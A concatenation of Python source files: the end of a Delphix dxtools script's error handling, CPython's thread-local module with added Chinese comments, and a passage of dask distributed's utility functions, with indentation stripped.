dx_session_obj = GetSession()
logging_est(arguments["--logdir"])
print_debug(arguments)
time_start = time()
single_thread = False
config_file_path = arguments["--config"]
# Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
# This is the function that will handle processing main_workflow for
# all the servers.
run_job()
elapsed_minutes = time_elapsed()
print_info(
"script took {:.2f} minutes to get this far.".format(elapsed_minutes)
)
# Here we handle what we do when the unexpected happens
except DlpxException as e:
print_exception(
"script encountered an error while processing the"
"config file:\n{}".format(e)
)
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print_exception(
"Connection failed to the Delphix Engine"
"Please check the ERROR message:\n{}".format(e)
)
sys.exit(1)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that
we have actionable data
"""
elapsed_minutes = time_elapsed()
print_exception("A job failed in the Delphix Engine")
print_info(
"{} took {:.2f} minutes to get this far\n{}".format(
basename(__file__), elapsed_minutes, e
)
)
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info(
"{} took {:.2f} minutes to get this far\n".format(
basename(__file__), elapsed_minutes
)
)
except:
"""
Everything else gets caught here
"""
print_exception(sys.exc_info()[0])
elapsed_minutes = time_elapsed()
print_info(
"{} took {:.2f} minutes to get this far\n".format(
basename(__file__), elapsed_minutes
)
)
sys.exit(1)
if __name__ == "__main__":
# Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
# Feed our arguments to the main function, and off we go!
main(arguments)
|
_threading_local.py | """Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = sorted(mydata.__dict__.items())
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... def __init__(self, /, **kw):
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red')], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
from weakref import ref
from contextlib import contextmanager
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that all platforms on CPython do have support
# for locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest.
class _localimpl:
"""A class managing thread-local dicts"""
__slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__'
def __init__(self):
# The key used in the Thread objects' attribute dicts.
# We keep it a string for speed but make it unlikely to clash with
# a "real" attribute.
self.key = '_threading_local._localimpl.' + str(id(self))
# { id(Thread) -> (ref(Thread), thread-local dict) }
self.dicts = {}
def get_dict(self):
"""Return the dict for the current thread. Raises KeyError if none
defined."""
thread = current_thread()
return self.dicts[id(thread)][1]
def create_dict(self):
"""Create a new dict for the current thread, and return it."""
localdict = {}
key = self.key
thread = current_thread()
idt = id(thread)
def local_deleted(_, key=key):
# When the localimpl is deleted, remove the thread attribute.
thread = wrthread()
if thread is not None:
del thread.__dict__[key]
def thread_deleted(_, idt=idt):
# When the thread is deleted, remove the local dict.
# Note that this is suboptimal if the thread object gets
# caught in a reference loop. We would like to be called
# as soon as the OS-level thread ends instead.
local = wrlocal()
if local is not None:
dct = local.dicts.pop(idt)
# 这里使用弱引用是为了避免循环引用
# 在 dicts 中记录每个线程是为了在 thread local 被销毁时, 方便删除线程中引用的 thread local
# 在线程中记录 thread local 是为了在线程被销毁时, 方便删除 thread local 中引用的线程.
# 而这些又都是通过弱引用的 callback 来实现的.
# 这个实现思路非常值得学习.
wrlocal = ref(self, local_deleted)
wrthread = ref(thread, thread_deleted)
thread.__dict__[key] = wrlocal
self.dicts[idt] = wrthread, localdict
return localdict
@contextmanager
def _patch(self):
impl = object.__getattribute__(self, '_local__impl')
try:
dct = impl.get_dict()
except KeyError:
dct = impl.create_dict()
args, kw = impl.localargs
self.__init__(*args, **kw)
with impl.locallock:
object.__setattr__(self, '__dict__', dct)
yield
class local:
__slots__ = '_local__impl', '__dict__'
def __new__(cls, /, *args, **kw):
if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
self = object.__new__(cls)
impl = _localimpl()
impl.localargs = (args, kw)
impl.locallock = RLock()
object.__setattr__(self, '_local__impl', impl)
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
impl.create_dict()
return self
def __getattribute__(self, name):
with _patch(self):
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__setattr__(self, name, value)
def __delattr__(self, name):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__delattr__(self, name)
from threading import current_thread, RLock
|
utils.py | from __future__ import print_function, division, absolute_import
import atexit
from collections import deque
from contextlib import contextmanager
from datetime import timedelta
import functools
from hashlib import md5
import inspect
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = '__no_default__'
def _initialize_mp_context():
if PY3 and not sys.platform.startswith('win') and 'PyPy' not in sys.version:
method = dask.config.get('distributed.worker.multiprocessing-method')
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ['distributed']
if 'pkg_resources' in sys.modules:
preload.append('pkg_resources')
ctx.set_forkserver_preload(preload)
else:
ctx = multiprocessing
return ctx
mp_context = _initialize_mp_context()
def funcname(func):
"""Get the name of a function."""
while hasattr(func, 'func'):
func = func.func
try:
return func.__name__
except AttributeError:
return str(func)
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in getargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family, default):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
# XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
warnings.warn("Couldn't detect a suitable IP address for "
"reaching %r, defaulting to %r: %s"
% (host, default, e), RuntimeWarning)
return default
finally:
sock.close()
def get_ip(host='8.8.8.8', port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET, default='127.0.0.1')
def get_ipv6(host='2001:4860:4860::8888', port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6, default='::1')
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
for info in psutil.net_if_addrs()[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions as e:
pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
@gen.coroutine
def All(args, quiet_exceptions=()):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
raise gen.Return(results)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False)) or
(hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
raise RuntimeError("IOLoop is closed")
timeout = kwargs.pop('callback_timeout', None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
class LoopRunner(object):
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if (self._asynchronous or real_runner is not None or count > 0):
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(start_exc[0], Exception): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, 'w') as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if 'IPython' not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), 'kernel', None) is not None
hex_pattern = re.compile('[a-f]+')
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split('-')
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (len(word) == 8 and
hex_pattern.match(word) is not None):
result += '-' + word
else:
break
if len(result) == 32 and re.match(r'[a-f0-9]{32}', result):
return 'data'
else:
if result[0] == '<':
result = result.strip('<>').split()[0].split('.')[-1]
return result
except Exception:
return 'Other'
try:
from functools import lru_cache
except ImportError:
lru_cache = False
pass
else:
key_split = lru_cache(100000)(key_split)
if PY3:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
elif typ is bytes:
return key_split_group(x.decode())
else:
return 'Other'
else:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str or typ is unicode:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
else:
return 'Other'
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root='distributed'):
"""
Force all existing loggers below *root* to the given level at least
(or keep the existing level if less verbose).
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(hostname,
1234, # dummy port number
fam, socket.SOCK_STREAM)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [os.path.join('distributed', 'worker'),
os.path.join('distributed', 'scheduler'),
os.path.join('tornado', 'gen.py'),
os.path.join('concurrent', 'futures')]
while exc_traceback and any(b in exc_traceback.tb_frame.f_code.co_filename
for b in bad):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message",
str(e)[:n])
except Exception:
return Exception("Long error message",
type(e),
str(e)[:n])
else:
return e
if sys.version_info >= (3,):
# (re-)raising StopIteration is deprecated in 3.6+
exec("""def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
return result.value
yield result
""")
else:
# Returning non-None from generator is a syntax error in 2.x
def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
raise result
yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
q = Queue(maxsize=maxsize)
t = threading.Thread(target=_dump_to_queue, args=(seq, q))
t.daemon = True
t.start()
return q
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is unicode or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not unicode and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)"
% (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (istask(task) or
type(task) is list and any(map(_maybe_complex, task)) or
type(task) is dict and any(map(_maybe_complex, task.values())))
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b''
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter):]
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=''):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
try:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
""" Turn string or bytes to bytes
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
if isinstance(s, memoryview):
return s.tobytes()
if isinstance(s, bytearray) or PY2 and isinstance(s, buffer): # noqa: F821
return bytes(s)
if hasattr(s, 'encode'):
return s.encode()
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=''):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in ('.py',): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == '.py': # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in ('.egg', '.zip', '.pyz'):
if path not in sys.path:
sys.path.insert(0, path)
if ext == '.egg':
import pkg_resources
pkgs = pkg_resources.find_distributions(path)
for pkg in pkgs:
names_to_import.append(pkg.project_name)
elif ext in ('.zip', '.pyz'):
names_to_import.append(name)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(reload(import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter(object):
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ('index',)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def format_bytes(n):
""" Format bytes as text
>>> format_bytes(1)
'1 B'
>>> format_bytes(1234)
'1.23 kB'
>>> format_bytes(12345678)
'12.35 MB'
>>> format_bytes(1234567890)
'1.23 GB'
>>> format_bytes(1234567890000)
'1.23 TB'
>>> format_bytes(1234567890000000)
'1.23 PB'
"""
if n > 1e15:
return '%0.2f PB' % (n / 1e15)
if n > 1e12:
return '%0.2f TB' % (n / 1e12)
if n > 1e9:
return '%0.2f GB' % (n / 1e9)
if n > 1e6:
return '%0.2f MB' % (n / 1e6)
if n > 1e3:
return '%0.2f kB' % (n / 1000)
return '%d B' % n
byte_sizes = {
'kB': 10**3,
'MB': 10**6,
'GB': 10**9,
'TB': 10**12,
'PB': 10**15,
'KiB': 2**10,
'MiB': 2**20,
'GiB': 2**30,
'TiB': 2**40,
'PiB': 2**50,
'B': 1,
'': 1,
}
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and 'i' not in k})
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and 'i' in k})
def parse_bytes(s):
""" Parse byte string to numbers
>>> parse_bytes('100')
100
>>> parse_bytes('100 MB')
100000000
>>> parse_bytes('100M')
100000000
>>> parse_bytes('5kB')
5000
>>> parse_bytes('5.4 kB')
5400
>>> parse_bytes('1kiB')
1024
>>> parse_bytes('1e6')
1000000
>>> parse_bytes('1e6 kB')
1000000000
>>> parse_bytes('MB')
1000000
"""
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:]
n = float(prefix)
multiplier = byte_sizes[suffix.lower()]
result = n * multiplier
return int(result)
timedelta_sizes = {
's': 1,
'ms': 1e-3,
'us': 1e-6,
'ns': 1e-9,
'm': 60,
'h': 3600,
'd': 3600 * 24,
}
tds2 = {
'second': 1,
'minute': 60,
'hour': 60 * 60,
'day': 60 * 60 * 24,
'millisecond': 1e-3,
'microsecond': 1e-6,
'nanosecond': 1e-9,
}
tds2.update({k + 's': v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})
def parse_timedelta(s, default='seconds'):
""" Parse timedelta string to number of seconds
Examples
--------
>>> parse_timedelta('3s')
3
>>> parse_timedelta('3.5 seconds')
3.5
>>> parse_timedelta('300ms')
0.3
